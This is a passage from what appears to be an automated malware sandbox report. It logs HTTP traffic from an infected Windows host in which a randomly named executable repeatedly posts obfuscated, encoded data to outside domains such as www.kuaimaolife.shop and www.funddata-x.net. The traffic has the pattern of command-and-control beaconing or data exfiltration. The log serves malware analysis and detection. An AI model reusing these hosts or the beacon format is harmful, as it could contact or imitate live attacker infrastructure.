0dfXG=R2UTTSVaSCSHsnTWJxoDOpkfCH88olKwkiXxfMVqdOgdWiKCu0OiSrnkZFWzUhKSYIVfIh2kEMjTNCNaD3FCTYKEzMoGsEdD2ZfPn+y+N/9gmUfLteKGXjQWAYwmipzP8EW1lWZYXIkuxArFIU/BGigDqvLLEMdR/Fi+qcGvSDVwOTCD9yl6SOy4dHMlhGLeLAGr6ytXQMlK
Nov 25, 2024 13:57:55.031673908 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 12:57:54 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	50039	92.118.228.160	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:56.402599096 CET	819	OUT	POST /wlzg/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/wlzg/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 52 32 55 54 54 53 56 61 53 43 53 48 74 48 44 57 45 79 41 44 49 4a 6b 51 4d 6e 38 38 79 56 4b 30 6b 69 4c 78 66 4f 35 36 63 34 49 64 57 48 75 43 76 31 4f 69 52 72 6e 6b 4d 31 57 79 51 68 4b 46 59 49 59 73 49 6c 32 6b 45 4d 48 54 4e 47 42 61 43 45 74 46 54 49 4b 43 2b 73 6f 41 6f 45 64 44 32 5a 66 50 6e 2b 58 70 4e 35 56 67 6d 48 58 4c 73 2f 4b 4a 65 44 51 58 57 49 77 6d 6d 70 79 47 38 45 57 62 6c 54 42 68 58 4c 63 75 78 43 7a 46 4a 47 48 65 49 69 68 49 6b 50 4b 42 42 2b 6f 49 35 58 58 61 69 38 75 4a 44 68 45 53 4c 6c 44 5a 68 42 6c 5a 41 65 53 36 64 46 55 58 68 6d 4c 30 4a 41 2b 72 6f 6c 68 77 66 34 41 70 30 57 61 2b 4e 6c 4d 45 63 2f 52 52 4d 41 65 6e 58 38 45 6d 6d 77 3d 3d Data Ascii: 0dfXG=R2UTTSVaSCSHtHDWEyADIJkQMn88yVK0kiLxfO56c4IdWHuCv1OiRrnkM1WyQhKFYIYsIl2kEMHTNGBaCEtFTIKC+soAoEdD2ZfPn+XpN5VgmHXLs/KJeDQXWIwmmpyG8EWblTBhXLcuxCzFJGHeIihIkPKBB+oI5XXai8uJDhESLlDZhBlZAeS6dFUXhmL0JA+rolhwf4Ap0Wa+NlMEc/RRMAenX8Emmw==
Nov 25, 2024 13:57:57.706636906 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 12:57:57 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	50040	92.118.228.160	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:59.054929972 CET	1832	OUT	POST /wlzg/ HTTP/1.1 Host: www.kuaimaolife.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.kuaimaolife.shop Referer: http://www.kuaimaolife.shop/wlzg/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 52 32 55 54 54 53 56 61 53 43 53 48 74 48 44 57 45 79 41 44 49 4a 6b 51 4d 6e 38 38 79 56 4b 30 6b 69 4c 78 66 4f 35 36 63 34 41 64 57 78 69 43 75 53 61 69 51 72 6e 6b 51 6c 57 33 51 68 4b 45 59 49 51 67 49 6c 79 65 45 4f 50 54 58 6c 4a 61 4c 56 74 46 41 6f 4b 43 33 4d 6f 46 73 45 64 73 32 5a 76 44 6e 2b 48 70 4e 35 56 67 6d 47 48 4c 72 75 4b 4a 53 6a 51 57 41 59 77 69 69 70 79 75 38 45 2b 74 6c 53 31 75 57 37 38 75 78 69 6a 46 4c 7a 72 65 41 69 68 4b 6e 50 4c 55 42 2b 30 74 35 54 33 34 69 38 71 33 44 68 67 53 49 55 72 50 31 42 52 52 65 4a 36 6f 64 54 41 49 70 53 44 48 42 52 2b 50 6d 31 56 53 65 61 77 6c 74 43 66 6e 59 6c 35 66 52 66 52 54 50 30 6e 78 53 6f 42 64 6c 6a 67 7a 72 35 48 46 42 39 4e 35 51 73 56 34 70 56 49 4c 6e 73 34 67 5a 74 6d 67 4d 4f 39 72 4f 41 72 54 7a 68 76 77 62 42 68 38 79 6f 57 61 76 6b 42 51 68 49 65 71 61 66 43 51 66 6a 31 35 30 67 46 35 6f 56 43 6e 32 2f 5a 77 6d 53 36 45 33 4b 63 30 5a 2b 68 76 59 42 32 54 71 74 47 55 54 42 4d 2b 79 44 45 67 30 78 57 35 [TRUNCATED] Data Ascii: 0dfXG=R2UTTSVaSCSHtHDWEyADIJkQMn88yVK0kiLxfO56c4AdWxiCuSaiQrnkQlW3QhKEYIQgIlyeEOPTXlJaLVtFAoKC3MoFsEds2ZvDn+HpN5VgmGHLruKJSjQWAYwiipyu8E+tlS1uW78uxijFLzreAihKnPLUB+0t5T34i8q3DhgSIUrP1BRReJ6odTAIpSDHBR+Pm1VSeawltCfnYl5fRfRTP0nxSoBdljgzr5HFB9N5QsV4pVILns4gZtmgMO9rOArTzhvwbBh8yoWavkBQhIeqafCQfj150gF5oVCn2/ZwmS6E3Kc0Z+hvYB2TqtGUTBM+yDEg0xW5IvtW52R3e1NW0qigVydXU9SasEo0nzAEMzxyjWhbYWMM0r5W+o2H2NIfxURBRurK7yl4xStAx206GsZZEqiiScZuCsaTZUnhL0zz/3GAaA2qc+xaiSbNGn1cBpaysCZy9a8v/u1hsKKA6wY86QjK0UWnSno6trveo0m3RjyC91UyC6VKCU+0tnJpheUi5srmbYHWsLDB5Wm6stHc5KWE94zU1mTrjLV6BVmE9KH4pNRjBex1xw+6f+iLIpw7mM+3ISQXq8ag5D/NA5x5VXGvgTvy3cWs6ZnIkAA9QzdxA27RHw3FlFVyYCZE6zPv7/3FVy14KXQkXI7xDaT+M59UM84DSD0y8V803bIb50UgZWMU2yIv1yHrVY1fDhu5lLE+NjNapvx0osS4pLn0ow32PuEZrvLeua6Oaibc0YF3K0CXrdlUhwyLCXBJxoACzpI8oRF9ozVzp2y9OSctvJS790fFXSBs6alcVCa1FSayWsKQjoQcG282xgYjTT4jJFUmrAfpAxLE/AIuSWeM2vEuMaOFQRbdYPagGAsieT2iJxRx8Z1fqx8jBAjY3N55TnavQuCIArkOjZ9ldGTlOItcS2sajMqcE9MCSMTNOB1N72zEe53idi6HhFHmK1t7bCTn4bcbZ4nlcAxZIGzm+pERcT0L+Aw+zPy0TH [TRUNCATED]
Nov 25, 2024 13:58:00.265623093 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 12:58:00 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	50041	92.118.228.160	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:01.711209059 CET	529	OUT	GET /wlzg/?0dfXG=c08zQlMNeTS9mFjcPTIyFfA1amU1nGqngy7ufrhJTucKXTiOjnqlR7bZNhOZWme4Y5s9JAieBcHnX0Bnfm5WdfKnufcgj0lRy4Tut92jAo5YyVSLqem1aQwSKpkntqqW/GXfj2I=&U0W=7ROlj HTTP/1.1 Host: www.kuaimaolife.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:58:03.036997080 CET	691	IN	HTTP/1.1 404 Not Found Server: nginx Date: Mon, 25 Nov 2024 12:58:02 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	50042	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:08.672667980 CET	789	OUT	POST /ktuy/ HTTP/1.1 Host: www.funddata-x.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 210 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.funddata-x.net Referer: http://www.funddata-x.net/ktuy/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 33 37 65 6a 54 4d 4a 56 79 59 32 74 69 6b 71 6b 62 48 6c 72 59 57 58 34 7a 30 7a 56 47 64 38 36 4c 2b 4c 37 57 61 31 33 71 5a 43 6d 71 75 36 6a 70 65 38 54 69 50 77 4e 67 52 75 49 78 51 66 31 69 57 6a 6a 6a 71 6c 36 38 7a 45 48 54 77 41 48 5a 59 6f 37 62 32 39 6b 6f 6a 51 45 64 43 6f 79 67 58 65 32 36 4e 67 4d 37 4b 45 36 44 44 52 33 75 78 6d 49 74 32 70 70 53 44 6e 61 52 31 44 45 53 67 61 4b 68 79 52 68 58 58 2f 70 48 4f 6a 65 54 50 38 70 46 50 51 6a 48 6f 33 79 36 6a 69 78 48 64 62 46 62 4c 4a 6d 61 30 58 4d 4c 56 46 6e 4b 73 64 2b 56 70 67 67 47 37 4d 78 6f 35 33 69 70 32 79 2b 78 51 71 71 63 57 7a 6c Data Ascii: 0dfXG=37ejTMJVyY2tikqkbHlrYWX4z0zVGd86L+L7Wa13qZCmqu6jpe8TiPwNgRuIxQf1iWjjjql68zEHTwAHZYo7b29kojQEdCoygXe26NgM7KE6DDR3uxmIt2ppSDnaR1DESgaKhyRhXX/pHOjeTP8pFPQjHo3y6jixHdbFbLJma0XMLVFnKsd+VpggG7Mxo53ip2y+xQqqcWzl

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	50043	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:11.337779999 CET	813	OUT	POST /ktuy/ HTTP/1.1 Host: www.funddata-x.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.funddata-x.net Referer: http://www.funddata-x.net/ktuy/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 33 37 65 6a 54 4d 4a 56 79 59 32 74 74 6b 61 6b 4c 52 74 72 4e 47 58 33 75 45 7a 56 4d 39 38 2b 4c 2b 58 37 57 65 6c 6e 70 72 57 6d 71 4c 2b 6a 71 63 45 54 79 66 77 4e 31 68 75 4e 73 41 66 75 69 57 76 4e 6a 76 46 36 38 7a 51 48 54 30 45 48 5a 50 38 34 64 6d 39 6d 69 7a 51 43 54 69 6f 79 67 58 65 32 36 4e 6c 70 37 4b 63 36 44 7a 68 33 6f 56 79 58 6b 57 70 71 56 44 6e 61 56 31 44 41 53 67 61 34 68 33 34 45 58 52 37 70 48 4c 66 65 51 64 45 71 65 66 51 6c 44 6f 32 7a 39 6d 44 5a 4e 37 4f 31 65 36 64 31 43 57 2f 62 4b 6a 45 39 57 66 64 64 48 35 41 69 47 35 55 44 6f 5a 33 49 72 32 4b 2b 6a 48 6d 4e 54 69 57 47 6c 64 35 47 62 4d 68 4a 49 6f 5a 67 67 4f 47 61 6f 4f 34 79 33 41 3d 3d Data Ascii: 0dfXG=37ejTMJVyY2ttkakLRtrNGX3uEzVM98+L+X7WelnprWmqL+jqcETyfwN1huNsAfuiWvNjvF68zQHT0EHZP84dm9mizQCTioygXe26Nlp7Kc6Dzh3oVyXkWpqVDnaV1DASga4h34EXR7pHLfeQdEqefQlDo2z9mDZN7O1e6d1CW/bKjE9WfddH5AiG5UDoZ3Ir2K+jHmNTiWGld5GbMhJIoZggOGaoO4y3A==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	50044	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:13.993177891 CET	1826	OUT	POST /ktuy/ HTTP/1.1 Host: www.funddata-x.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.funddata-x.net Referer: http://www.funddata-x.net/ktuy/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 33 37 65 6a 54 4d 4a 56 79 59 32 74 74 6b 61 6b 4c 52 74 72 4e 47 58 33 75 45 7a 56 4d 39 38 2b 4c 2b 58 37 57 65 6c 6e 70 72 75 6d 71 35 32 6a 71 37 6f 54 67 50 77 4e 70 78 75 4d 73 41 66 6a 69 57 33 4a 6a 76 41 48 38 31 63 48 53 52 51 48 4f 4f 38 34 55 6d 39 6d 71 54 51 48 64 43 6f 64 67 57 79 71 36 4d 56 70 37 4b 63 36 44 31 46 33 76 42 6d 58 6f 32 70 70 53 44 6e 47 52 31 44 38 53 67 44 50 68 33 31 78 55 68 62 70 48 72 76 65 41 34 6f 71 53 66 51 6e 50 49 33 67 39 6d 48 47 4e 2f 76 45 65 36 70 66 43 57 4c 62 4c 32 5a 44 4d 4e 64 72 61 4c 46 45 57 65 30 63 73 63 33 33 6e 48 6a 45 67 6d 36 71 53 52 61 56 39 39 34 59 57 71 63 47 4b 62 49 4b 2f 35 48 75 72 64 4d 69 72 32 77 30 31 65 62 6f 78 55 48 35 5a 77 47 6a 63 72 52 6c 34 4e 4f 4a 77 75 6f 30 74 57 79 66 78 6e 43 64 43 69 51 55 72 75 6e 75 57 4d 35 6e 79 4c 50 47 6b 38 4c 48 6e 64 6c 55 34 6f 74 5a 31 38 78 75 73 57 30 43 38 30 75 32 38 52 61 58 31 38 6a 4f 63 37 33 6e 2b 57 4e 49 59 2b 61 65 2b 6b 75 63 72 63 5a 48 44 73 6b 71 [TRUNCATED] Data Ascii: 0dfXG=37ejTMJVyY2ttkakLRtrNGX3uEzVM98+L+X7Welnprumq52jq7oTgPwNpxuMsAfjiW3JjvAH81cHSRQHOO84Um9mqTQHdCodgWyq6MVp7Kc6D1F3vBmXo2ppSDnGR1D8SgDPh31xUhbpHrveA4oqSfQnPI3g9mHGN/vEe6pfCWLbL2ZDMNdraLFEWe0csc33nHjEgm6qSRaV994YWqcGKbIK/5HurdMir2w01eboxUH5ZwGjcrRl4NOJwuo0tWyfxnCdCiQUrunuWM5nyLPGk8LHndlU4otZ18xusW0C80u28RaX18jOc73n+WNIY+ae+kucrcZHDskqACr4BGYmY9kaV6+LZ37wknR5N4rq0nYI0UoqVzMiIc17z01PUxxuwdqRQd+upvGHBVFssO53NTpcefDhhLzWZcIFCu6hf4XQoIc0HMg83WhSVqd6hY+oGH33K/5QDT4SoJa5WvarzJ+ROryZtk7+de0YVd6BTbcKzMaHcXyzQuEAibloIUZRz02cISF1HaJXiu3ejzdkHQme9qBfq/I2OE9sEomspq/pcTUxA5cxuX665em8MgLzP6sFaJw5HffXGaBtCYafOHrv1ufGrN1IUqHX0MlZSAl7iKI7LSKiMapaVkdECLZ5eB1xk0rLOw3eT7BuAJmpwXuoGcOeifhqooz7K+H6OJpzTxynzGgzpNU2RVDKhkFoEckeS3VYlXBRNJN2UMk8D9NNhVvHSRJbco9IhTreTMvXKesq0vbglHhFOges2qpr1craCKnvJHW371rSMs//5+Lxxu2cdHHTz6aiBD23PSpKYfUSun89daY3rb0VNN74xa8Cvk4i3lnWfB0yqEyH4zevgEF702+FtFXoTuP+kxvzdbU0JNTdWgWP7rXZQlPX8OSe4N2v0IQgoji45Bu33FJ2w3naWO/WXKTvWl5tO2hD2pvYKF5vJZVCZkuu6hua8s9WoQnrZ1WnMHyJdLFSShoCRa3fLeY9L7ZZT1fV3BoeNg [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	50045	3.33.130.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:58:16.648319006 CET	527	OUT	GET /ktuy/?U0W=7ROlj&0dfXG=652DQ4wRyI2XhVz/YhB0IQPCvW3zE+wrC97TZKhiuJWrpaOjtOEU/fEJ0zut8nj2vm3uuaJhtQEDGSF/YMgRQz9E7T0dRnILtzW899MV4oEvPyMvvne8hVkOXAeZd0jlejfVwHA= HTTP/1.1 Host: www.funddata-x.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36
Nov 25, 2024 13:58:17.837351084 CET	407	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 25 Nov 2024 12:58:17 GMT Content-Type: text/html Content-Length: 267 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 55 30 57 3d 37 52 4f 6c 6a 26 30 64 66 58 47 3d 36 35 32 44 51 34 77 52 79 49 32 58 68 56 7a 2f 59 68 42 30 49 51 50 43 76 57 33 7a 45 2b 77 72 43 39 37 54 5a 4b 68 69 75 4a 57 72 70 61 4f 6a 74 4f 45 55 2f 66 45 4a 30 7a 75 74 38 6e 6a 32 76 6d 33 75 75 61 4a 68 74 51 45 44 47 53 46 2f 59 4d 67 52 51 7a 39 45 37 54 30 64 52 6e 49 4c 74 7a 57 38 39 39 4d 56 34 6f 45 76 50 79 4d 76 76 6e 65 38 68 56 6b 4f 58 41 65 5a 64 30 6a 6c 65 6a 66 56 77 48 41 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?U0W=7ROlj&0dfXG=652DQ4wRyI2XhVz/YhB0IQPCvW3zE+wrC97TZKhiuJWrpaOjtOEU/fEJ0zut8nj2vm3uuaJhtQEDGSF/YMgRQz9E7T0dRnILtzW899MV4oEvPyMvvne8hVkOXAeZd0jlejfVwHA="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	50047	209.74.64.190	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
